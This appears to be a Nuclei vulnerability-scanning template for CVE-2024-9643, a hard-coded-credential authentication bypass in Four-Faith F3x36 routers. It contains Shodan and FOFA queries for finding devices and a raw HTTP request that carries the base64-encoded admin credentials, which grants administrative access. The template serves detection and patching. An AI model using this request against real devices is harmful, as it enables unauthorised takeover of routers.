id: CVE-2024-9643 info: name: Four-Faith F3x36 - Authentication Bypass author: trader642 severity: critical description: | Four-Faith F3x36 router with firmware v2.0.0 contains an authentication bypass caused by hard-coded credentials in the administrative web server, letting attackers with knowledge of credentials gain administrative access via crafted HTTP requests. impact: | Attackers can gain unauthorized administrative access, potentially leading to full control over the device. remediation: | Update to the latest firmware version provided by the vendor to fix hard-coded credential issues. reference: - https://vulncheck.com/advisories/four-faith-hard-coded-creds - https://talosintelligence.com/vulnerability_reports/TALOS-2023-1752 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-9643 epss-score: 0.0293 epss-percentile: 0.8562 cwe-id: CWE-798 metadata: verified: true max-request: 1 vendor: four-faith product: f3x36 shodan-query: "Four-Faith" fofa-query: body="Four-Faith" tags: cve,cve2024,four-faith,default-login,router,iot,auth-bypass,vkev http: - raw: - | GET /Status_Router.asp HTTP/1.1 Host: {{Hostname}} Authorization: Basic ZmZhZG1pbjpmZmFkbWluZmY= matchers: - type: dsl dsl: - 'status_code == 200' - 'contains_all(body, "Four-Faith","Status")' - 'contains(server, "httpd_four-faith")' condition: and # digest: 490a0046304402206fb473f7edb540545a9be85e391956f6a0d33d35e1fbe64c0eb5df11d0f0be3c022002d9ba0e125a324c2096394e47da098026172d7aa6dff0f813015dd3cdeef978:922c64590222798bb761d5b6d8e72950